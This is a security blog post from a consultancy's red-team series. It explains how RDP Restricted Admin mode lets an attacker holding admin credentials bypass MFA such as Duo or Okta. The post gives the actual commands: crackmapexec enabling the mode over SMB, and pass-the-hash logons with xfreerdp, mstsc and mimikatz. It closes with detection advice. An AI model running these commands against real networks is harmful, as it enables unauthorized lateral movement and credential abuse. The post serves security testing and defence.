Restricted Admin Mode – Circumventing MFA On RDP Logons

Restricted Admin Mode – Circumventing MFA On RDP Logons
Cyber Labs

12 of 20

This insight is part 12 of 20 in this Collection.

November 15, 2023 7 mins

Restricted Admin Mode – Circumventing MFA On RDP Logons

Restricted admin mode

This blog post demonstrates the use of Restricted Admin mode to circumvent MFA in RDP as a red team tactic.

Overview

In the last decade, Microsoft introduced a new Remote Desktop security feature called Restricted Admin mode to prevent credential caching and subsequent reuse. When enabled, the Restricted Admin mode allows circumventing multi-factor authentication (MFA) enforced by identity and access management solution providers such as Duo and Okta. While this weakness is known and has been documented by at least one of these providers, this blog post serves to demonstrate leveraging this caveat as a red team tactic.

Context

In recent years, corporate environments have embraced identity and access management solution providers such as Okta and Duo to protect access to a host of applications and resources such as email, office suites, and cloud storage solutions. Those providers offer products to authenticate access to these applications with a number of options including MFA and passwordless authentication using mobile devices.

These technologies found their way into corporate Active Directory domain environments that have for years set the standard for centralized enterprise resource allocation and management. Those environments, comprised of Microsoft Windows servers and workstations, now have implemented MFA for a variety of logon processes ranging from a standard login by an employee at a workstation to a remote desktop login on a server by an administrator.

The addition of these authentication mechanisms in networked enterprise environments has made it increasingly difficult for red team operators and threat actors alike who may rely on Remote Desktop Protocol (RDP) as a means of lateral movement after obtaining an initial foothold. The underlying reason why Remote Desktop is a prime target for adversaries is because it is generally permitted by firewalls and other network security devices since administrators use it to jump around various servers and workstations with ease. While there are other services that may be permitted for smooth functioning of an Active Directory environment such as Microsoft Remote Procedure Call (MSRPC) and Server Message Block (SMB), Remote Desktop remains a critical attack surface to defend, as it is a legitimate way of logging onto a host without executing code that may be detected by antivirus or intrusion detection systems.

The adoption of Remote Desktop also shed light on other security weaknesses, namely caching of credentials on the Windows host being connected to. Specifically, the Windows Local Security Authority Subsystem Service (LSASS) process on the Remote Desktop host stores a copy of the credentials used for interactive logon authentication. These credentials are utilized to service subsequent connection requests to authenticated resources such as file shares. To combat this, Microsoft released an addition to RDP called Restricted Admin mode. This mode allows users that possess local administrative privileges on the Remote Desktop host to complete the authentication process without supplying the password in cleartext. As a result, the password is never cached on the logon host and cannot be reused by a threat actor to escalate privileges across the environment. At the same time, this functionality allows pass-the-hash attacks against RDP and hence puts corporations in a fix whether to prioritize chances of credential compromise versus reuse.

MFA Caveat

However, the specifics of the authentication process are of interest when operating in Restricted Admin mode. The distinction is between an “interactive” versus a “network” logon and since the Restricted Admin mode uses the latter (adopting a token-based method as compared to cleartext credentials), the authentication doesn’t take place on the Remote Desktop server but instead on the client itself. As a result, authentication factors enforced on the destination server such as MFA provisioned via Duo, Okta, or potentially other identity and access management solutions are rendered ineffective.

A caveat that arises from this mode within RDP is that threat actors can completely bypass MFA on servers and/or workstations when attempting to laterally move across the corporate environment if they possess administrative privileges. While the Restricted Admin mode is disabled by default, the following red teaming Tactics, Techniques, and Procedures (TTPs) describe how it could be leveraged to expand coverage and access across the network.

Imagine the following scenario: the adversary has gained an initial foothold within a firm’s internal network infrastructure and has access to a set of administrative credentials that can be used to compromise a domain-connected Windows host. They have attempted to log on via RDP but there’s a multi-factor mechanism that is sending a push notification to the victim user’s phone and awaiting approval. At this point, the adversary could attempt an MFA fatigue attack by spamming the victim device with push requests in hope that they accept the notification, but this approach is noisy and has rate limitations.

Since they have access to credentials, they can interrogate an administrative session over port SMB/445 (which does not enforce MFA as it’s a network logon) and enable the restricted admin mode:


crackmapexec smb <IP> -u <username> -p <password> -x 'reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD'

Next, they can generate the NTLM hash for the supplied password and bypass MFA on the Remote Desktop server using FreeRDP on Linux:


xfreerdp /v:<IP> /u:<victim username> /d:<domain> /pth:<victim password-hash>

Or the official Remote Desktop client on Windows (logged-on user’s context):


mstsc.exe /restrictedadmin

On Windows, they can either hijack the logged-on user’s context or request a service ticket using mimikatz:


mimikatz # sekurlsa::pth /user:<victim username> /domain:<domain> /ntlm:<victim password hash> /run:"mstsc.exe /restrictedadmin"

Detection

In order to detect this MFA bypass, EDR systems and/or system administrators should monitor the server registry to ensure that the DisableRestrictedAdmin key is set to 1, which indicates that the mode remains disabled. In the event that this value is modified, a security alert should be triggered which causes the isolation and quarantine of the originating host in order to stop the adversary in their tracks. While these recommendations serve as detective and responsive controls, there is no known remediation at the time of writing for this issue, which has been documented by some identity and access management vendors such as Duo but not all.

Aon’s Thought Leader
  • Apurva Goenka
    Senior Consultant, Security Testing, Cyber Solutions

About Cyber Solutions:

Aon’s Cyber Solutions offers holistic cyber risk management, unsurpassed investigative skills, and proprietary technologies to help clients uncover and quantify cyber risks, protect critical assets, and recover from cyber incidents.

General Disclaimer

This document is not intended to address any specific situation or to provide legal, regulatory, financial, or other advice. While care has been taken in the production of this document, Aon does not warrant, represent or guarantee the accuracy, adequacy, completeness or fitness for any purpose of the document or any part of it and can accept no liability for any loss incurred in any way by any person who may rely on it. Any recipient shall be responsible for the use to which it puts this document. This document has been compiled using information available to us up to its date of publication and is subject to any qualifications made in the document.

Terms of Use

The contents herein may not be reproduced, reused, reprinted or redistributed without the expressed written consent of Aon, unless otherwise authorized by Aon. To use information contained herein, please write to our team.

Aon's Better Being Podcast

Our Better Being podcast series, hosted by Aon Chief Wellbeing Officer Rachel Fellowes, explores wellbeing strategies and resilience. This season we cover human sustainability, kindness in the workplace, how to measure wellbeing, managing grief and more.

Aon Insights Series Asia

Expert Views on Today's Risk Capital and Human Capital Issues

Aon Insights Series Pacific

Expert Views on Today's Risk Capital and Human Capital Issues

Aon Insights Series UK

Expert Views on Today's Risk Capital and Human Capital Issues

Construction and Infrastructure

The construction industry is under pressure from interconnected risks and notable macroeconomic developments. Learn how your organization can benefit from construction insurance and risk management.

Cyber Labs

Stay in the loop on today's most pressing cyber security matters.

Cyber Resilience

Our Cyber Resilience collection gives you access to Aon’s latest insights on the evolving landscape of cyber threats and risk mitigation measures. Reach out to our experts to discuss how to make the right decisions to strengthen your organization’s cyber resilience.

Employee Wellbeing

Our Employee Wellbeing collection gives you access to the latest insights from Aon's human capital team. You can also reach out to the team at any time for assistance with your employee wellbeing needs.

Environmental, Social and Governance Insights

Explore Aon's latest environmental social and governance (ESG) insights.

Q4 2023 Global Insurance Market Insights

Our Global Insurance Market Insights highlight insurance market trends across pricing, capacity, underwriting, limits, deductibles and coverages.

Regional Results

How do the top risks on business leaders’ minds differ by region and how can these risks be mitigated? Explore the regional results to learn more.

Human Capital Analytics

Our Human Capital Analytics collection gives you access to the latest insights from Aon's human capital team. Contact us to learn how Aon’s analytics capabilities helps organizations make better workforce decisions.

Insights for HR

Explore our hand-picked insights for human resources professionals.

Workforce

Our Workforce Collection provides access to the latest insights from Aon’s Human Capital team on topics ranging from health and benefits, retirement and talent practices. You can reach out to our team at any time to learn how we can help address emerging workforce challenges.

Mergers and Acquisitions

Our Mergers and Acquisitions (M&A) collection gives you access to the latest insights from Aon's thought leaders to help dealmakers make better decisions. Explore our latest insights and reach out to the team at any time for assistance with transaction challenges and opportunities.

Navigating Volatility

How do businesses navigate their way through new forms of volatility and make decisions that protect and grow their organizations?

Parametric Insurance

Our Parametric Insurance Collection provides ways your organization can benefit from this simple, straightforward and fast-paying risk transfer solution. Reach out to learn how we can help you make better decisions to manage your catastrophe exposures and near-term volatility.

Pay Transparency and Equity

Our Pay Transparency and Equity collection gives you access to the latest insights from Aon's human capital team on topics ranging from pay equity to diversity, equity and inclusion. Contact us to learn how we can help your organization address these issues.

Property Risk Management

Forecasters are predicting an extremely active 2024 Atlantic hurricane season. Take measures to build resilience to mitigate risk for hurricane-prone properties.

Technology

Our Technology Collection provides access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities of technology. Reach out to the team to learn how we can help you use technology to make better decisions for the future.

Top 10 Global Risks

Trade, technology, weather and workforce stability are the central forces in today’s risk landscape.

Trade

Our Trade Collection gives you access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities for international business. Reach out to our team to understand how to make better decisions around macro trends and why they matter to businesses.

Weather

With a changing climate, organizations in all sectors will need to protect their people and physical assets, reduce their carbon footprint, and invest in new solutions to thrive. Our Weather Collection provides you with critical insights to be prepared.

Workforce Resilience

Our Workforce Resilience collection gives you access to the latest insights from Aon's Human Capital team. You can reach out to the team at any time for questions about how we can assess gaps and help build a more resilience workforce.

More Like This

View All
View All
Subscribe CTA Banner